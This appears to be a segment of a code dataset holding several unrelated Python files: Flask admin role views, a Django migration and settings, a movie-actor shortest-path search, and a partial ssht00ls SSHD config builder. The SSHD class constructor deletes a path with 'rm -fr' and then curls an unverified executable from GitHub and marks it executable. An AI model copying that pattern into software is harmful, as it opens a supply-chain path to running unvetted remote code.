check_admin()\n add_role = True\n form = RoleForm()\n if form.validate_on_submit():\n\n # add the new role to database if the role name is not duplicated\n try:\n role = Role(name=form.name.data, description=form.description.data)\n db.session.add(role)\n db.session.commit()\n flash('You has successfully added a new role')\n\n except:\n # if the duplicated entry is found\n flash('Errors: role name already existed')\n #return to roles list\n return redirect(url_for('admin.list_roles'))\n # render to form where can fill up the name and description\n return render_template('role.html', add_role=add_role, form=form, title='Add role')\n\n\n@admin.route('/roles/edit/', methods=['GET','POST'])\n@login_required\ndef edit_role(id):\n \"\"\"\n edit one role\n \"\"\"\n check_admin()\n add_role=False\n role = Role.query.get_or_404(id)\n form = RoleForm(object=role)\n if form.validate_on_submit():\n # update current role\n role.name = form.name.data\n role.description = form.description.data\n db.session.commit()\n flash('You have successfully updated the role')\n redirect(url_for('admin.list_roles'))\n form.name.data = role.name\n form.description.data = role.description\n return render_template('role.html', add_role=add_role, form=form, title='Edit role')\n\n\n@admin.route('/roles/delete/', methods=['GET','POST'])\n@login_required\ndef delete_role(id):\n \"\"\"\n\n delete a role\n \"\"\"\n check_admin()\n add_role=False\n role = Role.query.get_or_404(id)\n db.session.delete(role)\n db.session.commit()\n flash('You have successfully deleted a role')\n\n #redirect to roles list\n return redirect(url_for('admin.list_roles'))\n\n return render_template(title='Delete role')\n\n\n@admin.route('/employees')\n@login_required\ndef list_employees():\n \"\"\"\n assign department and role to employee\n \"\"\"\n check_admin()\n employees = Employee.query.all()\n return render_template('list_employees.html', employees=employees, title='Employees')\n\n@admin.route('/employee/assign/', methods=['GET','POST'])\n@login_required\ndef assign_employee(id):\n \"\"\"\n assign a department and role to employee\n \"\"\"\n check_admin()\n employee = Employee.query.get_or_404(id)\n if employee.is_admin:\n abort(403)\n\n form = EmployeeAssignForm(obj=employee)\n if form.validate_on_submit():\n employee.department = form.department.data\n employee.role = form.role.data\n db.session.add(employee)\n db.session.commit()\n\n flash('You have successfully assign department and role to employee')\n return redirect(url_for('admin.list_employees'))\n return render_template('employee.html', employee=employee, form=form, title='Assign Employee')","sub_path":"app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"496930533","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('CRM', '0010_auto_20160521_1410'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='appointment',\n name='record',\n field=models.OneToOneField(related_name='appointments', null=True,\n verbose_name=b'\\xe5\\x92\\xa8\\xe8\\xaf\\xa2\\xe8\\xae\\xb0\\xe5\\xbd\\x95',\n to='CRM.Record'),\n ),\n ]\n","sub_path":"CRM/migrations/0011_auto_20160521_1411.py","file_name":"0011_auto_20160521_1411.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"137202724","text":"\"\"\"\nDjango settings for the nmrr project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.2/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.2/ref/settings/\n\"\"\"\nimport os\n\nfrom core_main_app.utils.logger.logger_utils import (\n set_generic_handler,\n set_generic_logger,\n update_logger_with_local_app,\n)\nfrom mongoengine.connection import connect\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ[\"DJANGO_SECRET_KEY\"]\n# SECURITY WARNING: only list host/domain names that this Django site can serve\nALLOWED_HOSTS = os.environ[\"ALLOWED_HOSTS\"].split(\",\") if \"ALLOWED_HOSTS\" in os.environ else []\n# SERVER URI\nSERVER_URI = os.environ[\"SERVER_URI\"]\n\n# Databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.postgresql_psycopg2\",\n \"HOST\": os.environ[\"POSTGRES_HOST\"] if \"POSTGRES_HOST\" in os.environ else None,\n \"PORT\": int(os.environ[\"POSTGRES_PORT\"]) if \"POSTGRES_PORT\" in os.environ else 5432,\n \"NAME\": os.environ[\"POSTGRES_DB\"] if \"POSTGRES_DB\" in os.environ else None,\n \"USER\": os.environ[\"POSTGRES_USER\"] if \"POSTGRES_USER\" in os.environ else None,\n \"PASSWORD\": os.environ[\"POSTGRES_PASS\"] if \"POSTGRES_PASS\" in os.environ else None,\n }\n}\n\nMONGO_HOST = os.environ[\"MONGO_HOST\"] if \"MONGO_HOST\" in os.environ else \"\"\nMONGO_PORT = os.environ[\"MONGO_PORT\"] if \"MONGO_PORT\" in os.environ else \"27017\"\nMONGO_DB = os.environ[\"MONGO_DB\"] if \"MONGO_DB\" in os.environ else \"\"\nMONGO_USER = os.environ[\"MONGO_USER\"] if \"MONGO_USER\" in os.environ else \"\"\nMONGO_PASS = os.environ[\"MONGO_PASS\"] if \"MONGO_PASS\" in os.environ else \"\"\nMONGODB_URI = (\n f\"mongodb://{MONGO_USER}:{MONGO_PASS}@{MONGO_HOST}:{MONGO_PORT}/{MONGO_DB}\"\n)\nconnect(MONGO_DB, host=MONGODB_URI)\n\n\nBROKER_TRANSPORT_OPTIONS = {\n \"visibility_timeout\": 3600,\n \"fanout_prefix\": True,\n \"fanout_patterns\": True,\n}\nREDIS_HOST = os.environ[\"REDIS_HOST\"] if \"REDIS_HOST\" in os.environ else \"\"\nREDIS_PORT = os.environ[\"REDIS_PORT\"] if \"REDIS_PORT\" in os.environ else \"6379\"\nREDIS_PASS = os.environ[\"REDIS_PASS\"] if \"REDIS_PASS\" in os.environ else None\nREDIS_URL = f\"redis://:{REDIS_PASS}@{REDIS_HOST}:{REDIS_PORT}\"\n\nBROKER_URL = REDIS_URL\nCELERY_RESULT_BACKEND = REDIS_URL\n\n# Label customization\nWEBSITE_SHORT_TITLE = \"NMRR\"\nCUSTOM_DATA = \"Materials Data\"\nCUSTOM_NAME = os.environ[\"SERVER_NAME\"]\nCUSTOM_TITLE = \"Materials Resource Registry\"\nCUSTOM_SUBTITLE = \"Part of the Materials Genome Initiative\"\nCURATE_MENU_NAME = \"Publish resource\"\nEXPLORE_MENU_NAME = \"Search for resources\"\nWEBSITE_ADMIN_COLOR = \"blue\"\n# black, black-light, blue, blue-light, green, green-light, purple, purple-light, red, red-light, yellow, yellow-light\n\nif SERVER_URI.lower().startswith(\"https\"):\n # Activate HTTPS\n os.environ[\"HTTPS\"] = \"on\"\n\n # Secure cookies\n CSRF_COOKIE_SECURE = True\n CSRF_COOKIE_AGE = None\n SESSION_COOKIE_SECURE = True\n SESSION_EXPIRE_AT_BROWSER_CLOSE = True\n SESSION_COOKIE_AGE = 604800\n\n # Set x-frame options\n X_FRAME_OPTIONS = \"SAMEORIGIN\"\n\n# Application definition\nINSTALLED_APPS = (\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.sites\",\n \"django.contrib.staticfiles\",\n # Extra apps\n \"rest_framework\",\n \"drf_yasg\",\n \"rest_framework_mongoengine\",\n \"menu\",\n \"tz_detect\",\n \"defender\",\n \"captcha\",\n # Core apps\n \"core_main_app\",\n \"core_main_registry_app\",\n \"core_website_app\",\n \"core_oaipmh_common_app\",\n \"core_oaipmh_harvester_app\",\n \"core_oaipmh_provider_app\",\n \"core_curate_registry_app\",\n \"core_curate_app\",\n \"core_parser_app\",\n \"core_parser_app.tools.modules\", # FIXME: make modules an app\n \"core_parser_app.tools.parser\", # FIXME: make parser an app\n \"core_explore_keyword_registry_app\", # /!\\ Should always be before core_explore_common_app\n \"core_explore_keyword_app\",\n \"core_explore_common_app\",\n \"core_explore_oaipmh_app\",\n \"core_dashboard_registry_app\",\n \"core_dashboard_common_app\",\n \"mptt\",\n \"core_linked_records_app\",\n # Modules\n \"core_module_local_id_registry_app\",\n \"core_module_status_registry_app\",\n \"core_module_fancy_tree_registry_app\",\n \"core_module_text_area_app\",\n # Local apps\n \"nmrr_home\",\n)\nMIDDLEWARE = (\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.locale.LocaleMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"defender.middleware.FailedLoginMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"tz_detect.middleware.TimezoneMiddleware\",\n)\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nROOT_URLCONF = \"nmrr.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [\"templates\"],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"core_main_app.utils.custom_context_processors.domain_context_processor\", # Needed by any curator app\n \"django.template.context_processors.i18n\",\n ],\n },\n },\n]\n\nWSGI_APPLICATION = \"nmrr.wsgi.application\"\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.2/topics/i18n/\n\nLANGUAGE_CODE = \"en-us\"\n\nTIME_ZONE = \"UTC\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLOCALE_PATHS = (os.path.join(BASE_DIR, \"locale\"),)\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATIC_URL = \"/static/\"\nSTATIC_ROOT = \"static.prod\"\n\nSTATICFILES_FINDERS = (\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\",\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n)\n\nSTATICFILES_DIRS = (\"static\",)\n\n# Logging\nLOGGING_SERVER = True\nLOGGING_CLIENT = True\nLOGGING_DB = True\n\nLOGGER_FILE_SERVER = os.path.join(BASE_DIR, \"logfile_server.txt\")\nLOGGER_FILE_CLIENT = os.path.join(BASE_DIR, \"logfile_client.txt\")\nLOGGER_FILE_DB = os.path.join(BASE_DIR, \"logfile_db.txt\")\nLOGGER_FILE_SECURITY = os.path.join(BASE_DIR, \"logfile_security.txt\")\nLOGGER_FILE_APP = os.path.join(BASE_DIR, \"logfile_app.txt\")\n\nLOGGER_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_CLIENT_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_SERVER_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_DB_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_APP_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\n\nLOGGER_MAX_BYTES = 500000\nLOGGER_BACKUP_COUNT = 2\n\nlocal_logger_conf = {\n \"handlers\": [\"app_handler\", \"console\"],\n \"level\": LOGGER_APP_LEVEL,\n}\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"fmt-default\": {\n \"format\": \"%(levelname)s: %(asctime)s\\t%(name)s\\t%(pathname)s\\tl.%(lineno)s\\t%(message)s\",\n \"datefmt\": \"%Y-%m-%d %H:%M:%S\",\n },\n },\n \"handlers\": {\n \"logfile-security\": {\n \"level\": \"DEBUG\",\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"filename\": LOGGER_FILE_SECURITY,\n \"maxBytes\": LOGGER_MAX_BYTES,\n \"backupCount\": LOGGER_BACKUP_COUNT,\n \"formatter\": \"fmt-default\",\n },\n \"console\": {\n \"level\": \"INFO\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"fmt-default\",\n },\n \"app_handler\": {\n \"level\": LOGGER_APP_LEVEL,\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"filename\": LOGGER_FILE_APP,\n \"maxBytes\": LOGGER_MAX_BYTES,\n \"backupCount\": LOGGER_BACKUP_COUNT,\n \"formatter\": \"fmt-default\",\n },\n },\n \"loggers\": {\n \"django.security\": {\n \"handlers\": [\"console\", \"logfile-security\"],\n \"level\": LOGGER_LEVEL,\n \"propagate\": True,\n },\n },\n}\n\nupdate_logger_with_local_app(LOGGING, local_logger_conf, INSTALLED_APPS)\n\nif LOGGING_CLIENT:\n set_generic_handler(\n LOGGING,\n \"logfile-template\",\n LOGGER_CLIENT_LEVEL,\n LOGGER_FILE_CLIENT,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.template\", LOGGER_CLIENT_LEVEL, [\"console\", \"logfile-template\"]\n )\n set_generic_handler(\n LOGGING,\n \"logfile-request\",\n LOGGER_CLIENT_LEVEL,\n LOGGER_FILE_CLIENT,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.request\", LOGGER_CLIENT_LEVEL, [\"console\", \"logfile-request\"]\n )\n\nif LOGGING_SERVER:\n set_generic_handler(\n LOGGING,\n \"logfile-server\",\n LOGGER_SERVER_LEVEL,\n LOGGER_FILE_SERVER,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.server\", LOGGER_SERVER_LEVEL, [\"console\", \"logfile-server\"]\n )\n\nif LOGGING_DB:\n set_generic_handler(\n LOGGING,\n \"logfile-django-db-backend\",\n LOGGER_DB_LEVEL,\n LOGGER_FILE_DB,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING,\n \"django.db.backends\",\n LOGGER_DB_LEVEL,\n [\"console\", \"logfile-django-db-backend\"],\n )\n\n# Password settings for django.contrib.auth validators\n# Specifies the minimum length for passwords.\nPASSWORD_MIN_LENGTH = 5\n# Specifies the minimum amount of required letters in a password.\nPASSWORD_MIN_LETTERS = 0\n# Specifies the minimum amount of required uppercase letters in a password.\nPASSWORD_MIN_UPPERCASE_LETTERS = 0\n# Specifies the minimum amount of required lowercase letters in a password.\nPASSWORD_MIN_LOWERCASE_LETTERS = 0\n# Specifies the minimum amount of required numbers in a password.\nPASSWORD_MIN_NUMBERS = 0\n# Specifies the minimum amount of required symbols in a password.\nPASSWORD_MIN_SYMBOLS = 0\n# Specifies the maximum amount of consecutive characters allowed in passwords.\nPASSWORD_MAX_OCCURRENCE = None\n\nMENU_SELECT_PARENTS = False\n\"\"\" boolean: Control if parent menu items should automatically have their selected property set to True if one of \ntheir children has its selected property set to True\n\"\"\"\n\nDATA_SOURCES_EXPLORE_APPS = [\"core_explore_oaipmh_app\"]\n\"\"\" List of data sources for the exploration apps\n\"\"\"\n\nSWAGGER_SETTINGS = {\n \"exclude_namespaces\": [], # List URL namespaces to ignore\n \"api_version\": \"1.1\", # Specify your API's version\n \"api_path\": \"/\", # Specify the path to your API not a root level\n \"enabled_methods\": [ # Specify which methods to enable in Swagger UI\n \"get\",\n \"post\",\n \"put\",\n \"patch\",\n \"delete\",\n ],\n \"api_key\": \"\", # An API key\n \"is_authenticated\": False, # Set to True to enforce user authentication,\n \"is_superuser\": False, # Set to True to enforce admin only access\n \"LOGIN_URL\": \"core_main_app_login\",\n \"LOGOUT_URL\": \"core_main_app_logout\",\n}\n\nREST_FRAMEWORK = {\n \"DEFAULT_AUTHENTICATION_CLASSES\": (\n \"rest_framework.authentication.BasicAuthentication\",\n \"rest_framework.authentication.SessionAuthentication\",\n ),\n}\n\n# Registry configuration\nREGISTRY_XSD_FILENAME = \"res-md.xsd\"\n\"\"\" str: Registry xsd filename used for the initialisation.\n\"\"\"\n\n# If you want to use your own schema, set your schema here\nREGISTRY_XSD_FILEPATH = os.path.join(\"xsd\", REGISTRY_XSD_FILENAME)\n\"\"\" str: Registry xsd path used for the initialisation.\n\"\"\"\n\n# If you want to use your own configuration file, set your configuration file here\nCUSTOM_REGISTRY_FILE_PATH = os.path.join(\"json\", \"custom_registry.json\")\n\"\"\" str: Custom registry configuration file path used for the initialisation.\n\"\"\"\n\nDEFAULT_DATA_RENDERING_XSLT = os.path.join(\n \"core_main_registry_app\", \"xsl\", \"xml2html.xsl\"\n)\n\nPARSER_DOWNLOAD_DEPENDENCIES = True\n\"\"\" boolean: Should the XSD parser download dependencies\n\"\"\"\n\nEXPLORE_ADD_DEFAULT_LOCAL_DATA_SOURCE_TO_QUERY = True\n\"\"\" boolean: Do we add the local data source to new queries by default\n\"\"\"\n\nSSL_CERTIFICATES_DIR = True\n\"\"\" boolean: Control whether requests verify the server's TLS certificate\n string: Path to a CA bundle\n\"\"\"\n\nVERIFY_DATA_ACCESS = False\n\"\"\" :py:class:`bool`: Additional checks that data returned by a query can be accessed (slow).\n\"\"\"\n\nDISPLAY_EDIT_BUTTON = False\n\"\"\" boolean: Display the edit button on the result page\n\"\"\"\n\nDATA_SORTING_FIELDS = [\"-last_modification_date\"]\n\"\"\" Array: Default sort fields for the data query. \n\"\"\"\n\nDATA_DISPLAYED_SORTING_FIELDS = [\n {\n \"field\": \"last_modification_date\",\n \"display\": \"Last updated\",\n \"ordering\": \"-last_modification_date\",\n },\n {\n \"field\": \"last_modification_date\",\n \"display\": \"First updated\",\n \"ordering\": \"+last_modification_date\",\n },\n {\"field\": \"title\", \"display\": \"Title (A-Z)\", \"ordering\": \"+title\"},\n {\"field\": \"title\", \"display\": \"Title (Z-A)\", \"ordering\": \"-title\"},\n]\n\"\"\"The default sorting fields displayed on the GUI, Data model field Array\"\"\"\n\nSORTING_DISPLAY_TYPE = \"single\"\n\"\"\"Result sorting graphical display type ('multi' / 'single')\"\"\"\n\nDEFAULT_DATE_TOGGLE_VALUE = False\n\"\"\" boolean: Set the toggle default value in the records list\n\"\"\"\n\n# Configure Django Defender\nDEFENDER_REDIS_URL = REDIS_URL\n\"\"\" :py:class:`str`: The Redis url for defender. \n\"\"\"\nDEFENDER_COOLOFF_TIME = 60\n\"\"\" integer: Period of inactivity after which old failed login attempts will be forgotten\n\"\"\"\nDEFENDER_LOGIN_FAILURE_LIMIT = 3\n\"\"\" integer: The number of login attempts allowed before a record is created for the failed login.\n\"\"\"\nDEFENDER_STORE_ACCESS_ATTEMPTS = True\n\"\"\" boolean: Store the login attempt to the database.\n\"\"\"\nDEFENDER_USE_CELERY = True\n\"\"\" boolean: Use Celery to store the login attempt to the database.\n\"\"\"\nDEFENDER_LOCKOUT_URL = \"/locked\"\n\"\"\" string: url to the defender error page (defined in core_main_registry_app)\n\"\"\"\nDISPLAY_PRIVACY_POLICY_FOOTER = True\n\"\"\" boolean: display the privacy policy link in the footer\n\"\"\"\nDISPLAY_TERMS_OF_USE_FOOTER = True\n\"\"\" boolean: display the terms of use link in the footer\n\"\"\"\nDISPLAY_CONTACT_FOOTER = True\n\"\"\" boolean: display the contact link in the footer\n\"\"\"\nDISPLAY_HELP_FOOTER = True\n\"\"\" boolean: display the help link in the footer\n\"\"\"\nDISPLAY_RULES_OF_BEHAVIOR_FOOTER = True\n\"\"\" boolean: display the rules of behavior link in the footer\n\"\"\"\n\nAUTO_SET_PID = True\n\"\"\" boolean: enable the automatic pid generation for saved data.\n\"\"\"\n\nID_PROVIDER_SYSTEMS = {\n \"local\": {\n \"class\": \"core_linked_records_app.utils.providers.local.LocalIdProvider\",\n \"args\": [],\n },\n}\n\"\"\" dict: provider systems available for registering PIDs\n\"\"\"\n\nID_PROVIDER_PREFIXES = [\"cdcs\"]\n\"\"\" list: accepted prefixes if manually specifying PIDs (first item is the\ndefault prefix)\n\"\"\"\n\nPID_XPATH = \"Resource.@localid\"\n\"\"\" string: location of the PID in the document, specified as dot notation\n\"\"\"\n\nCAN_SET_WORKSPACE_PUBLIC = False\n\"\"\" boolean: Can make a private workspace public\n\"\"\"\n\nCAN_SET_PUBLIC_DATA_TO_PRIVATE = False\n\"\"\" boolean: Can public data be made private\n\"\"\"\n\nCAN_ANONYMOUS_ACCESS_PUBLIC_DOCUMENT = True\n\"\"\" boolean: Can anonymous users access public data\n\"\"\"\n","sub_path":"deploy/cdcs/nmrr.settings.py","file_name":"nmrr.settings.py","file_ext":"py","file_size_in_byte":16059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"277973791","text":"import csv\nimport sys\nimport math\n\nfrom util import Node, StackFrontier, QueueFrontier\n\n# Maps names to a set of corresponding person_ids\nnames = {}\n\n# Maps person_ids to a dictionary of: name, birth, movies (a set of movie_ids)\npeople = {}\n\n# Maps movie_ids to a dictionary of: title, year, stars (a set of person_ids)\nmovies = {}\n\n\ndef load_data(directory):\n \"\"\"\n Load data from CSV files into memory.\n \"\"\"\n # Load people\n with open(f\"{directory}/people.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n people[row[\"id\"]] = {\n \"name\": row[\"name\"],\n \"birth\": row[\"birth\"],\n \"movies\": set()\n }\n if row[\"name\"].lower() not in names:\n names[row[\"name\"].lower()] = {row[\"id\"]}\n else:\n names[row[\"name\"].lower()].add(row[\"id\"])\n\n # Load movies\n with open(f\"{directory}/movies.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n movies[row[\"id\"]] = {\n \"title\": row[\"title\"],\n \"year\": row[\"year\"],\n \"stars\": set()\n }\n\n # Load stars\n with open(f\"{directory}/stars.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n try:\n people[row[\"person_id\"]][\"movies\"].add(row[\"movie_id\"])\n movies[row[\"movie_id\"]][\"stars\"].add(row[\"person_id\"])\n except KeyError:\n pass\n\n\ndef main():\n if len(sys.argv) > 2:\n sys.exit(\"Usage: python degrees.py [directory]\")\n directory = sys.argv[1] if len(sys.argv) == 2 else \"large\"\n\n # Load data from files into memory\n print(\"Loading data...\")\n load_data(directory)\n print(\"Data loaded.\")\n\n source = person_id_for_name(input(\"Name: \"))\n if source is None:\n sys.exit(\"Person not found.\")\n target = person_id_for_name(input(\"Name: \"))\n if target is None:\n sys.exit(\"Person not found.\")\n\n path = shortest_path(source, target)\n\n if path is None:\n print(\"Not connected.\")\n else:\n degrees = len(path)\n print(f\"{degrees} degrees of separation.\")\n path = [(None, source)] + path\n for i in range(degrees):\n person1 = people[path[i][1]][\"name\"]\n person2 = people[path[i + 1][1]][\"name\"]\n movie = movies[path[i + 1][0]][\"title\"]\n print(f\"{i + 1}: {person1} and {person2} starred in {movie}\")\n\n\ndef check_if_goal(node, target):\n \"\"\"\n Checks if current node is the target node\n if so returns a Path of actions to that node\n if not returns None\n \"\"\"\n\n # If this is the target we seek\n # Add the path to target to solutions list\n if node.state == target:\n path = []\n targetNode = node\n while targetNode.parent is not None:\n path.append(targetNode.action)\n targetNode = targetNode.parent\n path.reverse()\n return path\n return None\n\n\ndef shortest_path(source, target):\n \"\"\"\n Returns the shortest list of (movie_id, person_id) pairs\n that connect the source to the target.\n\n If no possible path, returns None.\n \"\"\"\n\n # Set source as root node\n start = Node(state=source, parent=None, action=None)\n\n # Initialize frontier with a Queue.\n # We use breadth-first search and hence a queue to ensure\n # that we find the most optimal (shortest) solution\n\n frontier = QueueFrontier()\n\n # Set of visited nodes\n explored_people = set()\n\n # Check if start is target\n goal = check_if_goal(start, target)\n\n # If start is target, end search\n if goal is not None:\n return goal\n\n # Add root node to frontier\n frontier.add(start)\n\n # Repeat until frontier is empty\n while True:\n if frontier.empty():\n break\n # Get the first node in the queue\n node = frontier.remove()\n\n # Mark the current node as explored by adding it to explored set\n explored_people.add(node.state)\n\n # Add node's neighbors to frontier\n for movie, person in neighbors_for_person(node.state):\n if not frontier.contains_state(\n person) and person not in explored_people:\n child = Node(state=person, parent=node, action=(movie, person))\n path = check_if_goal(child, target)\n if path is not None:\n return path\n else:\n frontier.add(child)\n return None\n\n\ndef person_id_for_name(name):\n \"\"\"\n Returns the IMDB id for a person's name,\n resolving ambiguities as needed.\n \"\"\"\n person_ids = list(names.get(name.lower(), set()))\n if len(person_ids) == 0:\n return None\n elif len(person_ids) > 1:\n print(f\"Which '{name}'?\")\n for person_id in person_ids:\n person = people[person_id]\n name = person[\"name\"]\n birth = person[\"birth\"]\n print(f\"ID: {person_id}, Name: {name}, Birth: {birth}\")\n try:\n person_id = input(\"Intended Person ID: \")\n if person_id in person_ids:\n return person_id\n except ValueError:\n pass\n return None\n else:\n return person_ids[0]\n\n\ndef neighbors_for_person(person_id):\n \"\"\"\n Returns (movie_id, person_id) pairs for people\n who starred with a given person.\n \"\"\"\n movie_ids = people[person_id][\"movies\"]\n neighbors = set()\n for movie_id in movie_ids:\n for person_id in movies[movie_id][\"stars\"]:\n neighbors.add((movie_id, person_id))\n return neighbors\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"week 0/projects/degrees/degrees.py","file_name":"degrees.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"503539090","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# imports.\nfrom ssht00ls.classes.config import *\nfrom ssht00ls.classes import utils\nfrom ssht00ls.classes.smartcards import smartcards\nfrom ssht00ls.classes.installation import installation\n\n# the sshd object class.\nclass SSHD(object):\n\tdef __init__(self):\n\t\t\n\t\t# check downloads.\n\t\tif CHECKS:\n\t\t\tutils_lib = gfp.clean(path=f\"{SOURCE_PATH}/classes/utils/\")\n\t\t\tfor subpath, url in [\n\t\t\t\t[\"handler\", \"https://raw.githubusercontent.com/vandenberghinc/ssht00ls/master/ssht00ls/classes/utils/handler\"],\n\t\t\t]:\n\t\t\t\tfull_path = gfp.clean(f\"{utils_lib}/{subpath}\")\n\t\t\t\tos.system(f\"rm -fr {full_path}\")\n\t\t\t\tos.system(f\"curl -s {url} -o {full_path} && chmod +x {full_path}\")\n\t\t\t\tif not os.path.exists(full_path):\n\t\t\t\t\traise exceptions.ModuleError(\"Failed to install the ssht00ls utils (#1).\")\n\n\tdef create(self,\n\t\t# save the configuration & banner.\n\t\tsave=False,\n\t\t# the ssh port.\n\t\tport=22,\n\t\t# the listen addresses.\n\t\tlisten_addresses=[],\n\t\t# the server's banner.\n\t\tbanner=\"Hello World!\",\n\t\t# the allowed users & options.\n\t\tusers={\n\t\t\t# define per user (all keys are optional).\n\t\t\t\"administrator\": {\n\t\t\t\t# the user's root permissions.\n\t\t\t\t\"root_permissions\":False,\n\t\t\t\t# authentication by password.\n\t\t\t\t\"password_authentication\":False,\n\t\t\t\t# authentication by keys.\n\t\t\t\t\"key_authentication\":True,\n\t\t\t\t# ip filter.\n\t\t\t\t\"ip_filter\":False,\n\t\t\t\t\"allowed_ips\":[],\n\t\t\t\t# sftp server only.\n\t\t\t\t\"sftp_only\":False,\n\t\t\t\t# the chroot directory (leave null to disable).\n\t\t\t\t\"chroot_directory\":None,\n\t\t\t\t# allowed connection options.\n\t\t\t\t\"x11_forwarding\":False,\n\t\t\t\t\"tcp_forwarding\":False,\n\t\t\t\t\"permit_tunnel\":False,\n\t\t\t\t\"allow_stream_local_forwarding\":False,\n\t\t\t\t\"gateway_ports\":False,\n\t\t\t},\n\t\t},\n\t):\n\n\t\t# check users.\n\t\tresponse = self.__check_user_items__(users)\n\t\tif response[\"error\"] != None: return response\n\n\t\t# check utils intalled (must be before __install_banner__).\n\t\tresponse = self.__check_utils_installed__(list(users.keys()))\n\t\tif response[\"error\"] != None: return response\n\n\t\t# intall banner.\n\t\tif save:\n\t\t\tresponse = self.__install_banner__(banner=banner, usernames=list(users.keys()))\n\t\t\tif response[\"error\"] != None: return response\n\n\t\t# defaults.\n\t\tconfiguration = '# SSHD_CONFIG:'\n\t\tconfiguration += '\\n# BY VANDENBERGHINC'\n\t\tconfiguration += '\\n# MODULE: ssht00ls'\n\t\tconfiguration += '\\n# AUTHOR: DAAN VAN DEN BERGH'\n\t\tconfiguration += '\\nAcceptEnv LANG LC_*'\n\t\tconfiguration += '\\nSubsystem sftp internal-sftp'\n\t\t#configuration += '\\nSubsystem sftp /usr/libexec/sftp-server'\n\t\tconfiguration += '\\nLoginGraceTime 60'\n\t\tconfiguration += '\\nMaxAuthTries 3'\n\t\tconfiguration += '\\nMaxSessions 10'\n\t\tconfiguration += \"\\nMaxStartups 999\"\n\t\tconfiguration += '\\nLogLevel VERBOSE'\n\t\tconfiguration += f'\\nPort {port}'\n\t\tconfiguration += '\\nProtocol 2'\n\n\t\t# defaults.\n\t\tconfiguration += '\\nPermitRootLogin {}'.format(\"no\")\n\t\tconfiguration += '\\nStrictModes {}'.format(\"yes\")\n\t\tconfiguration += '\\nPermitUserEnvironment {}'.format(\"no\")\n\t\tconfiguration += '\\nIgnoreRhosts {}'.format(\"yes\")\n\t\tconfiguration += '\\nPermitTunnel {}'.format(\"no\")\n\t\tconfiguration += '\\nX11Forwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nAllowTcpForwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nAllowStreamLocalForwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nGatewayPorts {}'.format(\"no\")\n\t\tconfiguration += '\\nPermitTTY {}'.format(\"yes\")\n\t\tfor 